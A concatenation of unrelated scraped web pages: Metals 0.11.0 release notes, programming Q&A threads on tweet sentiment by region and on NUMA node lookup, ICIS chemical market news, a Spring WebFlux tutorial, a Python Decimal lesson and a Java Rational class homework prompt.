Based on the work of ckipp01 in one of the previous releases, it's now possible to invoke a command to run anything in the current file. This means that anything located within the currently focused file, whether it's tests or a main class, will be properly discovered and run. In Visual Studio Code this replaces the previous default config generation: if no launch.json is specified in the workspace, any file can be run using the default run command (F5).

Editor support: Any editor that supports DAP

Support test explorer API

Metals 0.11.0 implements Visual Studio Code's Testing API. According to the documentation:

The Testing API allows Visual Studio Code extensions to discover tests in the workspace and publish results. Users can execute tests in the Test Explorer view and from decorations. With these new APIs, Visual Studio Code supports richer displays of outputs and diffs than was previously possible.

The Test Explorer UI is the new default way to run/debug test suites and replaces code lenses. The new UI adds a testing view, which shows all test suites declared in the project's modules. From this panel it's also possible to run/debug a test or to navigate to a test's definition. Code lenses are still the default in other editors and can be brought back by setting "metals.testUserInterface": "Code Lenses".

Editor support: Visual Studio Code

Go to definition via links for synthetic decorations

Since Metals v0.9.6 it's been possible to show additional information about synthetic code generated by the compiler. This includes implicit parameters, classes and conversions. It wasn't, however, possible to find their definitions. This limitation was mostly due to the lack of proper UI options in different editors. Recently, we managed to work around it by using command links that can be rendered in the hover and will bring the user to the right definition.
Editor support: Visual Studio Code, Sublime Text

Basic Java support

Thanks to the effort led by Arthurm1, Metals now supports a subset of features for Java files and even Java-only build targets. Currently the biggest missing piece is an interactive compiler that would allow us to properly support features such as completions, hover or signature help. This was made possible by using the Java semanticdb plugin included in the lsif-java project from Sourcegraph, and especially the work by olafurpg. The support includes:

- formatting
- code folding
- go to definition
- references
- go to implementation
- rename
- run/debug code lens for Java main classes

Thanks to dos65's work, these functionalities will now also work in dependency sources. We are still missing some of the interactive features, such as:

- hover
- completions
- signature help
- selection range

An important note: while we still want to support some more features, Metals is not a Java language server, so we will never offer the same amount of functionality as the tools and IDEs focused on the Java language. The current discussion about the scope of Java support can be found in this issue. In particular, we will most likely not support more advanced refactorings or presentation compiler functions.

Visual Studio Code: In case you want to use Metals in a Java-only workspace, it's now also possible to start Metals using a new Start Metals button in the Metals tab. We don't start Metals by default in such cases, as some other language server might be more suitable.

Editor support: All

Reworked Metals Doctor

Due to the other changes in this release, the Metals Doctor needed to be reworked to better show the different targets available in the workspace, as well as to explain a bit better what is supported and why something might not work. The type column can now have 3 different values: Scala <version>, sbt <version> or Java.
We also replaced some of the columns, which are now:

- diagnostics - tells whether, and what kind of, diagnostics are published for the target.
- interactive - tells whether interactive features such as hover or completions are working; this should work for all supported Scala and sbt versions.
- semanticdb - explains whether the semanticdb indexes are generated for the target.
- debugging - tells whether you can run or debug within that target.
- Java support - in mixed targets this tells users whether the semanticdb indexes are also generated for Java files.

You can always look for an explanation of these statuses underneath the table or on the right in the Recommendation column.

Editor support: All

Extension authors: If you are using the json output method for the doctor, you will need to modify the way it's displayed accordingly.

Miscellaneous

- Allow creating trace files for debugging in the .metals directory. kpodsiad
- Fix issues with stale code lens being shown. dos65
- Print Bloop logs when connection errored out. tgodzik
- Fix issues with given imports in organize imports. tgodzik
- Fix issues with type on selection in Ammonite scripts. tgodzik
- [Scala 3] Improve type shown for generics in hover. dos65
- [Scala 3] Fix go to definition for givens. dos65
- Use Mill --import to import bloop when supported. lolgab
- Enable creating a file with just a package. kpodsiad
- Fix Gradle detection when a file other than build.gradle is at top level. GavinRay97
- Use proper dialect and ignore sbt targets when automatically setting up scalafmt.conf. dos65
- Detect missing src.zip in doctor. ayoub-benali
- Ensure autoimports don't break scala-cli directives. ckipp01
- [Scala 3] Don't show error type if it cannot be inferred by the compiler. tgodzik
- Fix analyze stacktrace when using toplevel methods. tgodzik
- [Scala 3] Fix insert type in case of type aliases. tgodzik
- [Scala 3] Use maybeOwner instead of owner when looking for shortened name.
ckipp01
- [Scala 3] Fix autoimport with prefixes. dos65

Contributors

Big thanks to everybody who contributed to this release or reported an issue!

$ git shortlog -sn --no-merges v0.10.9..v0.11.0
Tomasz Godzik
Ayoub Benali
Vadim Chelyshov
Chris Kipp
Arthur McGibbon
Kamil Podsiadlo
Gavin Ray
Adrien Bestel
Alexandre Archambault
Lorenzo Gabriele
Thomas Lopatic

Merged PRs

v0.11.0 (2022-01-12)

Merged pull requests:

- Update Bloop to 1.4.12 #3497 (tgodzik)
- Fix issues with renames in Java files #3495 (tgodzik)
- feat(doctor): add in explanations to the json doctor output #3494 (ckipp01)
- Upgrade bloop to 1.4.11-51-ac1d788a #3492 (dos65)
- Fixed compilation issue #3496 (tgodzik)
- [Java] Support go-to-definition for *.java dependency sources #3470 (dos65)
- Add edit distance for Java files #3480 (tgodzik)
- Show more information in the doctor #3426 (tgodzik)
- Add support for Scala 2.13.8 #3491 (tgodzik)
- docs: update user config docs #3490 (ckipp01)
- fix: override pprint in docs #3489 (ckipp01)
- Don't show warnings for .metals/.tmp files #3488 (tgodzik)
- Fix: Docusaurus Edit URL is broken #3487 (abestel)
- parallelize source file indexing #3485 (Arthurm1)
- Cache build targets #3481 (Arthurm1)
- [Scala3] Fix autoimport with prefixes #3484 (dos65)
- [Issue Template] Relax requirements #3474 (dos65)
- [Build] add CommandSuite to TestGroups #3472 (dos65)
- Add folding range for Java using Scanner #3468 (tgodzik)
- cleanup: remove ./sbt from root of project #3471 (ckipp01)
- docs: migrate gitter references to Discord #3469 (ckipp01)
- refactor: refactor bug_report.md to be a yaml template #3467 (ckipp01)
- Add tests for java go to implementation #3466 (tgodzik)
- fix: use maybeOwner instead of owner when looking for shortened name #3465 (ckipp01)
- [Scala 3] Fix insert type in case of type aliases #3460 (tgodzik)
- fix: reuse main annotation logic from code lens in debug provider #3463 (ckipp01)
- update: update millw and add script for it in the future #3457 (ckipp01)
- Scala Steward - ignore org.eclipse updates #3453 (dos65)
- Update flyway-core to 8.2.3 #3452 (scala-steward)
- Update interface to 1.0.6 #3433 (scala-steward)
- Update scribe, scribe-file, scribe-slf4j to 3.6.7 #3432 (scala-steward)
- Update mill-contrib-testng to 0.10.0-M5 #3431 (scala-steward)
- Update sbt-welcome to 0.2.2 #3429 (scala-steward)
- Update jackson-databind to 2.13.1 #3428 (scala-steward)
- Update bloop-config, bloop-launcher to 1.4.11-30-75fb3441 #3427 (scala-steward)
- Fix analyze stacktrace when using toplevel methods #3425 (tgodzik)
- [Scala 3] Fix issues when type cannot be inferred by the compiler #3423 (tgodzik)
- refactor: take care of some deprecation warnings #3420 (ckipp01)
- refactor: small build cleanups #3418 (ckipp01)
- Fix issue with imports #3417 (tgodzik)
- [Scalafmt] set proper dialect for sbt-metals #3416 (dos65)
- docs: add file ids to the docs for new file commands #3415 (ckipp01)
- Add run/debug code lense for Java main classes #3400 (tgodzik)
- fix: ensure autoimports don't break scala-cli directives #3412 (ckipp01)
- dep: update sbt to 1.6.1 #3413 (ckipp01)
- [Mtags releases] Fails command if tag name doesn't match any pattern #3410 (dos65)
- Detect missing src.zip in doctor #3401 (ayoub-benali)
- Hardcode eclipse java formatter dependencies #3406 (Arthurm1)
- Upgrade file-tree-views to 2.1.8. See #3379. #3405 (uncle-betty)
- [Scalafmt] Fixes for automatic dialect rewrite #3394 (dos65)
- Handle Java-only build targets #2520 (Arthurm1)
- Use quick pick instead of message requests for debug discovery #3392 (tgodzik)
- Add support for 3.1.1-RC2 #3391 (tgodzik)
- Support sublime command links #3378 (ayoub-benali)
- [UNTESTED] Fix Gradle detection, multimodule proj #3385 (GavinRay97)
- Add Arthur to the team!
#3389 (tgodzik)
- [Actions] mtags-auto-release: specify github token #3390 (dos65)
- Print more info about missing presentation compiler #3388 (kpodsiad)
- Bump to sbt 1.6.0-RC2 #3384 (ckipp01)
- Move to Scala 3 published artifacts where possible #3382 (ckipp01)
- Enable to create file with just package #3375 (kpodsiad)
- Use full range when using go-to definition for synthetics #3374 (tgodzik)
- Fix quickpick #3353 (kpodsiad)
- Update requests to 0.7.0 #3367 (scala-steward)
- Update scalameta, semanticdb-scalac, ... to 4.4.31 #3372 (scala-steward)
- Update flyway-core to 8.2.2 #3370 (scala-steward)
- Update undertow-core to 2.2.14.Final #3369 (scala-steward)
- Update ujson to 1.4.3 #3368 (scala-steward)
- Update pprint to 0.7.1 #3366 (scala-steward)
- Update geny to 0.7.0 #3365 (scala-steward)
- Update bloop-config, bloop-launcher to 1.4.11-19-93ebe2c6 #3363 (scala-steward)
- [Scala3] Fix ImportMissingSymbol code action #3362 (dos65)
- Send Code lens refresh when supported by client #3355 (ayoub-benali)
- Add go to definition via links to synthetic decorations #3360 (tgodzik)
- [Build] Fix quick-publish-local #3361 (dos65)
- Add information about source of exceptions #3340 (tgodzik)
- Remove stray pprint #3357 (ckipp01)
- Use Mill --import to import bloop when supported #3356 (lolgab)
- Add test discovery endpoint #3277 (kpodsiad)
- [Build] Add quick-publish-local command #3351 (dos65)
- Actions - set jdk11 for mtags auto release #3348 (dos65)
- Wrap quickpick and input box results into options #3344 (kpodsiad)
- Cross tests - fix ignorance for test-mtags-dyn #3339 (dos65)
- [Actions] Fixes for mtags-auto-release workflow #3337 (dos65)
- Remove sublime version from the doc #3334 (ayoub-benali)
- Fix issues with non-latest Scala versions #3332 (tgodzik)
- Release process: publish mtags for the latest Metals release #3281 (dos65)
- Improve the "(currently using)" message during bsp-switch.
#3330 (ckipp01)
- Adjust json trace docs #3279 (kpodsiad)
- [Scala3] Fix go to defition for givens #3309 (dos65)
- Update xnio-nio to 3.8.5.Final #3327 (scala-steward)
- Bump coursier/setup-action from 1.1.1 to 1.1.2 #3329 (dependabot[bot])
- Update scalafix-interfaces to 0.9.33 #3328 (scala-steward)
- Update flyway-core to 8.0.5 #3326 (scala-steward)
- Update undertow-core to 2.2.13.Final #3325 (scala-steward)
- Update geny to 0.6.11 #3324 (scala-steward)
- Update sbt-scalafix, scalafix-interfaces to 0.9.33 #3322 (scala-steward)
- [Scala3] Hover - improve tpe selection for signature and expression #3320 (dos65)
- Move inactive maintainers to a separate list #3319 (tgodzik)
- Remove unused stuff #3321 (alexarchambault)
- Add option to run everything in the current file #3311 (tgodzik)
- Add extract value code action #3297 (tgodzik)
- Welcome Kamil to the team! #3317 (tgodzik)
- Document support of find text in dependency command in sublime #3318 (ayoub-benali)
- Better support for mill BSP #3308 (ckipp01)
- Fix json rendering in documentation #3316 (ayoub-benali)
- Add missing commands to client commands documentation #3315 (ayoub-benali)
- Add isCommandInHtmlSupported to InitializationOptions doc #3314 (ayoub-benali)
- Update sublime doc regarding Hover for selection #3313 (ayoub-benali)
- Simplify usage of sbt server when no .bsp/sbt.json exists #3304 (ckipp01)
- Support Scala3-NIGHTLY releases #3280 (dos65)
- Document source file analyzer support in sublime #3310 (ayoub-benali)
- ScalaVersion - discover new mtags version by coursier #3278 (dos65)
- Update ammonite to 2.4.1 #3292 (tgodzik)
- Fix expression for selection range in Ammonite #3303 (tgodzik)
- [Scala 3] Add selection range #3276 (tgodzik)
- Set rangeHoverProvider under experimental capabilities #3293 (ayoub-benali)
- Update to latest millw 0.3.9 #3295 (ckipp01)
- Update scalafix-interfaces to 0.9.32 #3291 (scala-steward)
- Update sbt-scalafix, scalafix-interfaces to 0.9.32 #3287 (scala-steward)
- Update mill-contrib-testng to 0.9.10 #3288 (scala-steward)
- Update qdox to 2.0.1 #3289 (scala-steward)
- Update flyway-core to 8.0.4 #3290 (scala-steward)
- docs: update commands that now use TextDocumentPositionParams #3284 (ckipp01)
- Update organize-imports rule with a fix for givens #3273 (tgodzik)
- Add example about attaching debugger #3275 (tgodzik)
- Add CFR class file viewer #3247 (Arthurm1)
- Print Bloop logs when connection errored out #3274 (tgodzik)
- Formatter: always specify global runner.dialect. #3259 (dos65)
- Finer grained rules on build errors for debug discovery. #3271 (ckipp01)
- RunDebugLens - fix stale lens #3270 (dos65)
- [Docs] Align the info about endpoints and their parameters with latest release #3232 (dos65)
- SuperMethodCodeLens - do not show stale lenses #3267 (dos65)
- Take into account trace files in .metals directory #3103 (kpodsiad)
- Fix issue with empty string in completions #3269 (tgodzik)
- Update versions #3268 (tgodzik)
- Add release notes for Metals v0.10.9 #3264 (tgodzik)
https://scalameta.org/metals/blog/2022/01/12/aluminium/
I have a txt file containing over 200 tweets and I'm trying to calculate total scores for all the tweets in a particular region given their long/lat. A typical tweet looks like:

[30.346168930000001, -97.73518] 0 2011-08-29 04:54:22 Best vacation of my life #byfar Happy: 1 Sad, 5:

from collections import Counter

with open('words.txt') as f:
    sentiments = {word: int(value) for word, value in (line.split(",") for line in f)}

with open('sentences.txt') as f:
    for line in f:
        values = Counter(word for word in line.split() if word in sentiments)
        if not values:
            continue

class Region:
    def __init__(self, lat_tuple, long_tuple):
        self.lat_tuple = lat_tuple
        self.long_tuple = long_tuple

    def contains(self, lat, long):
        return self.lat_tuple[0] <= lat and lat < self.lat_tuple[1] and \
               self.long_tuple[0] <= long and long < self.long_tuple[1]

eastern = Region((24.660845, 49.189787), (-87.518395, -67.444574))
central = Region((24.660845, 49.189787), (-101.998892, -87.518395))
mountain = Region((24.660845, 49.189787), (-115.236428, -101.998892))
pacific = Region((24.660845, 49.189787), (-125.242264, -115.236428))

I didn't check your coordinates completely, but you seem to be on the right track.
Using what you did, all I would need to do to parse the tweet file:

scores = {'eastern': 0, 'central': 0, 'pacific': 0, 'mountain': 0}
for line in open('tweets.txt'):
    line = line.split(" ")
    lat = float(line[0][1:-1])   # Stripping the [ and the ,
    long = float(line[1][:-1])   # Stripping the ]
    if eastern.contains(lat, long):
        scores['eastern'] += score(line)   # Assuming you have a score function
    elif central.contains(lat, long):
        scores['central'] += score(line)
    elif mountain.contains(lat, long):
        scores['mountain'] += score(line)
    elif pacific.contains(lat, long):
        scores['pacific'] += score(line)
    else:
        raise ValueError("Could not locate coordinates " + line[0] + line[1])

You could make this more elegant by wrapping the if statements in a function:

def region(lat, long):
    # Define your regions here in the function, or leave them as globals
    if eastern.contains(lat, long):
        return 'eastern'
    if central.contains(lat, long):
        return 'central'
    if mountain.contains(lat, long):
        return 'mountain'
    if pacific.contains(lat, long):
        return 'pacific'
    raise ValueError(" ".join(("could not locate coordinates", str(lat), str(long))))

Then the if statements in the loop are gone:

scores[region(lat, long)] += score(line)

EDIT: you need to define score to be a function that accepts a tweet, or the split line in my above code (which is a list of words, including the coordinates):

def score(tweet):
    total = 0
    for word in tweet:
        if word in sentiments:
            total += 1
    return total / (len(tweet) - 2)   # Subtract the coordinates from the length

Assuming the global sentiments is defined beforehand.
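Putting the answer's pieces together, here is a minimal self-contained sketch. The sentiment dictionary, the simplified score function and the sample line below are made-up stand-ins for the real words.txt/tweets.txt data, used only so the snippet runs on its own:

```python
from collections import Counter  # kept for parity with the question's code

class Region:
    """A latitude/longitude bounding box, same shape as the Region class above."""
    def __init__(self, lat_tuple, long_tuple):
        self.lat_tuple = lat_tuple
        self.long_tuple = long_tuple

    def contains(self, lat, long):
        return (self.lat_tuple[0] <= lat < self.lat_tuple[1]
                and self.long_tuple[0] <= long < self.long_tuple[1])

eastern = Region((24.660845, 49.189787), (-87.518395, -67.444574))
central = Region((24.660845, 49.189787), (-101.998892, -87.518395))
mountain = Region((24.660845, 49.189787), (-115.236428, -101.998892))
pacific = Region((24.660845, 49.189787), (-125.242264, -115.236428))

def region(lat, long):
    for name, r in (('eastern', eastern), ('central', central),
                    ('mountain', mountain), ('pacific', pacific)):
        if r.contains(lat, long):
            return name
    raise ValueError("could not locate coordinates %s %s" % (lat, long))

# A toy sentiment dictionary standing in for words.txt.
sentiments = {'best': 3, 'happy': 2}

def score(tweet_words):
    # tweet_words still includes the two coordinate tokens at the front;
    # unknown words simply contribute 0.
    return sum(sentiments.get(w.lower(), 0) for w in tweet_words)

scores = {'eastern': 0, 'central': 0, 'pacific': 0, 'mountain': 0}
line = "[30.34616893, -97.73518] 0 2011-08-29 04:54:22 Best vacation of my life"
parts = line.split(" ")
lat = float(parts[0][1:-1])   # strip the [ and the trailing comma
long = float(parts[1][:-1])   # strip the ]
scores[region(lat, long)] += score(parts)
print(scores)
```

The sample coordinates fall inside the central box, so only that bucket accumulates a score; the same loop applied over the whole tweets.txt file would fill in all four regions.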
https://codedump.io/share/EeNvQz7FFNZr/1/adding-scores-of-sentences-depending-on-region-python-very-lost
Answered by: get numa node from pointer adress

Is there a way to learn on which NUMA node a memory block resides? I have an application where large blocks of memory that are externally allocated need to be processed by multiple threads in parallel. I would like something like:

GetNumaNodeNumber(
    __in  LPVOID ptr,
    __out PULONG NodeNumber
);

Question Answers - All replies

I might have missed something here, but I don't know of anything. I will definitely ask and see if I have missed something, but there doesn't appear to be an equivalent to VirtualAllocExNuma which lets you query the NUMA node from an address. Windows Server 2008 R2 did extend the NUMA API set, and there is a good overview here:

Are you hitting measurable performance issues as a result of this, and, if I may ask, what is the rough HW config you're looking at here?

Thanks,
Rick

Rick Molloy
Parallel Computing Platform

- Marked as answer by rickmolloy Friday, September 18, 2009 4:14 PM
- Unmarked as answer by mattijsdegroot Friday, December 04, 2009 9:27 AM

Thanks a lot for your input and sorry for not responding sooner. I forgot to check for replies while I was busy with some other things. To be honest, I am not sure at this point whether I am hitting performance issues, since I have no way of knowing if the data resides on the node processing it or not. I have a camera that spits out frames of data at a high rate (ca. 500 MBytes/s). These frames need to be processed, and I would like to do the processing on the node where the data resides. Since I have no control over the memory allocation for the camera buffers, I would like to check on which node they reside. Even if there is no API function that does this, is there a way to determine it based on the pointer address? Is the first half of the address space allocated to Node 0 and the second half to Node 1, perhaps?
My hardware is the following:

- HP Proliant ML370 G6
- 2x Intel Xeon E5540
- 8GB memory

All comments are highly appreciated,
Mattijs

Thanks for the information. I'll have a look at that code. Do you agree that it would be reasonable to expect such a function in the API? It would seem to me that having to deal with externally allocated memory is a fairly common problem in NUMA-aware applications. Mattijs

I, personally, can see no reason why such information should be withheld or not presented via the API if the information is already available to the operating system itself. (Full system topology info is a related case in point that, in my opinion, should always have been available, since even before dual-processor machines first emerged; Win7 at least addresses that lack now.) There may even be some undocumented API that publishes the "memory@node" location that the other APIs use, buried someplace, that could be exposed as part of the NUMA API?

As you stated above, the information is indeed available. If I interpret the code for the NUMA Explorer correctly, it is possible to get the information through the process status API (PSAPI), but that is a very cumbersome process. Where could I file such an API feature request?

Indeed, QueryWorkingSetEx is the way to go for now. I got the following response from Microsoft after sending an API request:

QueryWorkingSetEx can be used for this. There is an example here:

Note that physical pages in a given virtual buffer are not necessarily allocated from the same NUMA node. In most cases, checking only the first page in the buffer should work, but there might be situations where the first page is allocated from node X and the rest of the pages are from node Y (even if all nodes in the system have plenty of available pages). This could happen, for example, if the contents of the first page are initialized by one thread, and the rest of the pages are initialized by a different thread whose ideal processor is part of a different node.
If they don't control how the buffer is allocated and initialized, it might make sense to check several pages at random and select the node that appears most often.

========

The example at the above link is "Allocating Memory from a NUMA Node." See the DumpNumaNodeInfo function for the QueryWorkingSetEx call. I will pass your API request on to the NUMA product team; they are currently in the planning stage for the next version of Windows. But in the meantime, I hope QueryWorkingSetEx works for your application so you don't have to wait. :-)

- Proposed as answer by Mohamed Ameen Ibrahim Friday, August 06, 2010 5:15 PM

After a long delay I revisited this problem and I have come up with the code listed below to directly determine the NUMA node from a pointer. It was actually much easier than I thought. It seems to work correctly, but beware that the pointer needs to point to initialized memory. If you like this function or have suggestions to improve it, I would love to see a reply. Mattijs

#define _WIN32_WINNT 0x0600
#include <windows.h>
#include <psapi.h>

int GetNumaNodeFromAdress(PVOID Buffer)
{
    //PCHAR StartPtr = (PCHAR)(Buffer);
    PSAPI_WORKING_SET_EX_INFORMATION WsInfo;
    WsInfo.VirtualAddress = Buffer;

    BOOL bResult = QueryWorkingSetEx(
        GetCurrentProcess(),
        &WsInfo,
        sizeof(PSAPI_WORKING_SET_EX_INFORMATION));

    if (!bResult)
        return -2;   // the query itself failed

    PCHAR Address = (PCHAR)WsInfo.VirtualAddress;
    BOOL IsValid = WsInfo.VirtualAttributes.Valid;
    DWORD Node = WsInfo.VirtualAttributes.Node;

    if (IsValid)
        return Node;
    else
        return -1;   // page not valid, e.g. not yet touched/initialized
}
https://social.msdn.microsoft.com/Forums/vstudio/en-US/37a02e17-e160-48d9-8625-871ff6b21f72/get-numa-node-from-pointer-adress?forum=parallelcppnative
24 June 2008 20:41 [Source: ICIS news]

HOUSTON (ICIS news)--Yara has purchased 12,500 tonnes of ammonia for the US Gulf from Potash Corporation of Saskatchewan (PotashCorp) at $585/tonne (€374/tonne), a source close to the transaction said on Tuesday.

The price is a jump for spot US Gulf CFR (cost and freight) ammonia, which was trading at around $515-517/tonne in the week ended 19 June, according to global chemical market intelligence service ICIS pricing.

The shipment is to load in Yuzhny during the first half of July on the Sombeke.

The more than 13% price increase comes at a time when the global food crisis has placed a premium on fertilizer chemicals. Further complicating matters is the flooding in the US cornbelt, which has decimated many of the country's crops and will likely lead to more aggressive planting next season, in turn increasing demand for ammonia.

($1 = €0.64)

To discuss issues facing the chemical industry go to ICIS connect
http://www.icis.com/Articles/2008/06/24/9135131/us-gulf-ammonia-increases-to-585tonne.html
11 December 2007 21:00 [Source: ICIS news]

By Nigel Davis

LONDON (ICIS news)--Chemical companies have been on a roll in 2007. Industry output is reckoned to have grown by 4.1%, compared with 4.5% in 2006 and 4.0% in 2005. US growth has slowed.

Against the backdrop of an economic slowdown, however, the industry faces tougher times. "Worldwide expectations for the coming months are rather negative and reflect the high uncertainty for businesses," the European chemicals trade federation Cefic said in its monthly economics report issued on Tuesday.

We are in the tricky position where the global perception of the economic situation has worsened, for some considerably, but remains above its long-term average.

Upstream in petrochemicals, the fourth quarter is unlikely to prove good. Volumes have remained relatively buoyant, but margins have been under pressure from higher energy and feedstock costs. Price increases have been hard won.

The ACC noted last week in its year-end report and outlook that chemical industry activity had moderated in 2007, paralleling the trend in broader industry. Leading indicators of global industrial production continue to suggest that the growth cycle has peaked, it said.

Bulk petrochemicals and organics output growth in 2007, based on data for the first 10 months of the year, is put at 4.3%, with plastics growth at 1.9%. These segments have been lifted by still relatively high domestic demand, including recovery in the automobile sector, and a considerable boost from exports. The lift to the industry from trade this year cannot be ignored. Plastics exports have risen between 10-20% in the year to date, consultants say.

The slowdown in manufacturing coming from light vehicles and the housing-related industries produced a downstream inventory correction during 2007.
By the third quarter, however, demand and supply were back in balance and the industry posted strengthening year-earlier comparisons, the ACC says. But the sector faces economic headwinds.

ACC chief economist Kevin Swift usually develops three growth scenarios for the industry to consider at this time of year. Strong growth, the brightest scenario, was virtually unthinkable in 2008, he said. There was a 55% chance that the economy would traverse a rocky road to a level of growth hit by the sub-prime mortgage fallout and housing downturn. In the worst case, he said, there was a 45% chance of recession.

Swift notes that jobs are still being created in the US. The threat of recession is real, but he is not one who believes that recession hit in November. However, if non-farm payroll gains are not greater than 75,000 a month for three months in a row, he contends that the downturn will have hit.

What of chemicals growth prospects then? The question arises of the impact of much slower growth. The upstream chemical industry, particularly, thrives when the economy does. To sustain 4% annual average output growth the sector needs...
http://www.icis.com/Articles/2007/12/11/9085942/insight-factoring-in-growth-in-tricky-times.html
Event Streaming Using Spring WebFlux

In Spring Framework 5, a new module was released for supporting reactive applications, called WebFlux.

Overview

Spring Framework 5 includes a new WebFlux module for supporting reactive applications. If we want systems that are responsive, resilient, elastic, and message-driven, then we need to introduce "reactive systems." WebFlux was created to address the need for a non-blocking web stack that can handle concurrency with a small number of threads. The term "reactive" refers to programming models that are built around reacting to change. In this regard, non-blocking is reactive, because, instead of being blocked, we are now in the mode of reacting to notifications as operations complete or data becomes available. It is fully non-blocking, supports reactive streams back pressure, and runs on servers such as Netty, Undertow, and Servlet 3.1+ containers. Node.js, for comparison, is able to serve thousands of requests with only one thread!

Data Types

Behind the scenes, Spring uses Reactor as the library to structure its new APIs. Flux and Mono are the two main concepts involved in reactive programming. Both are implementations of the Publisher interface, but Flux produces 0 to N items, while Mono produces 0 to 1 item.
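The Flux idea of a publisher that emits 0..N items over time, with a subscriber reacting to each one as it arrives, can be loosely pictured in Python with an async generator. This is only an analogy for intuition, not Spring or Reactor code, and all names below are invented:

```python
import asyncio

# A Flux-like publisher: an async generator emitting 0..N items over time.
async def temperatures(n):
    for _ in range(n):
        await asyncio.sleep(0.01)   # non-blocking delay, cf. Flux.delayElements
        yield 21                    # a fixed "reading" so the output is predictable

# A Mono, by analogy, would be a coroutine producing at most one value.
async def collect():
    readings = []
    async for t in temperatures(3):   # "subscribe" and react to each item
        readings.append(t)
    return readings

print(asyncio.run(collect()))  # [21, 21, 21]
```

The key point the analogy preserves is that the consumer never blocks a thread waiting for all items: control is yielded back to the event loop between emissions, which is the same property WebFlux relies on to serve many connections with few threads.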
The Sample System

For testing purposes, let's suppose that we need to create a service that continuously monitors the temperature of an object (in Celsius), in an IoT-style manner.

Preparations

We'll set up the following dependency:

<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-webflux</artifactId>
</dependency>

Server Part

Now, let's create the controller responsible for generating temperatures. Only the import lines of the original snippet survived in this copy, so the controller body below is a reconstruction consistent with the description that follows (the class name and endpoint details are guesses):

import java.time.Duration;
import java.util.Random;
import java.util.stream.Stream;

import org.springframework.http.MediaType;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RestController;

import reactor.core.publisher.Flux;

@RestController
public class TemperatureController {

    // emit a new random Celsius reading every second
    @GetMapping(value = "/temperatures", produces = MediaType.TEXT_EVENT_STREAM_VALUE)
    public Flux<Integer> temperatures() {
        Random random = new Random();
        return Flux.fromStream(Stream.generate(() -> random.nextInt(40)))
                   .delayElements(Duration.ofSeconds(1));
    }
}

The server part consists of a RestController with a route responding to the /temperatures path using the GET HTTP method. Flux is the reactive component that we use to send multiple objects to the client. We can create it in many different ways, but, for this simple scenario, we generate it from a Java 8 stream. The delayElements method is used to insert a delay before every item sent to the client.

Client Part

The client opens the connection with the server part (again a reconstructed sketch, here using Spring's reactive WebClient):

import org.springframework.http.MediaType;
import org.springframework.web.reactive.function.client.WebClient;

WebClient.create("http://localhost:8080")
         .get()
         .uri("/temperatures")
         .accept(MediaType.TEXT_EVENT_STREAM)
         .retrieve()
         .bodyToFlux(Integer.class)
         .subscribe(System.out::println);

Once we have specified the URL and the media type accepted by the client, we can retrieve the flux and subscribe to each event sent on it, in this case printing each element to the console.

Conclusions

In this article, we have seen how to produce and consume a stream of data in a reactive way using the new Spring WebFlux module. All of the code snippets mentioned in the article can be found in my GitHub repository.

Published at DZone with permission of Marco Giglione, DZone MVB. See the original article here. Opinions expressed by DZone contributors are their own.
https://dzone.com/articles/event-streaming-using-spring-webflux?fromrel=true
Let's say you are writing software that handles monetary transactions. If you used Python's built-in floating-point arithmetic to calculate a sum, it would result in a weirdly formatted number:

cost_of_gum = 0.10
cost_of_gumdrop = 0.35

cost_of_transaction = cost_of_gum + cost_of_gumdrop
# Returns 0.44999999999999996

Being familiar with rounding errors in floating-point arithmetic, you want to use a data type that performs decimal arithmetic more accurately. You could do the following:

from decimal import Decimal

cost_of_gum = Decimal('0.10')
cost_of_gumdrop = Decimal('0.35')

cost_of_transaction = cost_of_gum + cost_of_gumdrop
# Returns 0.45 instead of 0.44999999999999996

Above, we use the decimal module's Decimal data type to add 0.10 and 0.35. Since we used the Decimal type, the arithmetic behaves much more as expected.

Usually, modules will provide functions or data types that we can then use to solve a general problem, allowing us more time to focus on the software that we are building to solve a more specific problem.

Ready, set, fix some floating point math by using decimals!

Instructions

Run your code to see the weird floating point math that occurs.

In script.py, import Decimal from the decimal module.

Use Decimal to make two_decimal_points only have two decimal points and four_decimal_points to only have four decimal points.
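As a quick, runnable illustration of the same idea (the two variable values below are invented examples, not necessarily the ones used in the exercise's script.py):

```python
from decimal import Decimal

# Built-in binary floats pick up a tiny rounding error...
print(0.10 + 0.35)                        # 0.44999999999999996

# ...while Decimal does base-10 arithmetic and keeps the digits you wrote.
print(Decimal('0.10') + Decimal('0.35'))  # 0.45

# Construct Decimal from strings: Decimal(0.10) would inherit the float's error.
two_decimal_points = Decimal('0.25')
four_decimal_points = Decimal('0.1250')
print(two_decimal_points + four_decimal_points)  # 0.3750
```

Note how Decimal also preserves significant trailing zeros (0.3750, not 0.375), which matters when formatting monetary amounts.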
https://production.codecademy.com/courses/learn-python-3/lessons/modules-python/exercises/modules-python-decimals
This is for my AP Computer Science class that I am struggling with. Please help me.

Assignment Purpose: The primary purpose of this lab is to demonstrate knowledge of creating a class with object methods, instantiating multiple objects of the created class, and then calling the object methods from the main program method.

This program will utilize GUI input and output windows. For this assignment you are not expected to create this GUI code yourself. Your main concern is to create and use the Rational class. The Rational class is quite involved and will be developed over two separate assignments. This first assignment will just get the ball rolling. The main method is provided for you and needs to be used as shown. You are also provided with a getGCF method of the Rational class which will return the Greatest Common Factor of 2 integers. You will find this useful in writing other methods of the Rational class. Your mission is to complete the Rational class that is used by the Lab08MATH02st.java program.

Here is the code that they give you:

Code :
// MathLab02st.java
// The Rational Class Program I
// This is the student, starting version of the MathLab02 assignment.

import javax.swing.JOptionPane;

public class Lab08MATH02st
{
    public static void main (String args[])
    {
        String strNbr1 = JOptionPane.showInputDialog("Enter Numerator 1");
        String strNbr2 = JOptionPane.showInputDialog("Enter Denominator 2");
        int num = Integer.parseInt(strNbr1);
        int den = Integer.parseInt(strNbr2);
        Rational r = new Rational(num,den);
        JOptionPane.showMessageDialog(null,r.getNum()+"/"+r.getDen()+" equals "+r.getDecimal());
        System.exit(0);
    }
}

class Rational
{
    // Rational
    // getNum
    // getDen
    // getDecimal
    // getRational
    // getOriginal
    // reduce

    private int getGCF(int n1,int n2)
    {
        int rem = 0;
        int gcf = 0;
        do
        {
            rem = n1 % n2;
            if (rem == 0)
                gcf = n2;
            else
            {
                n1 = n2;
                n2 = rem;
            }
        }
        while (rem != 0);
        return gcf;
    }
}

80 Point Version Specifics
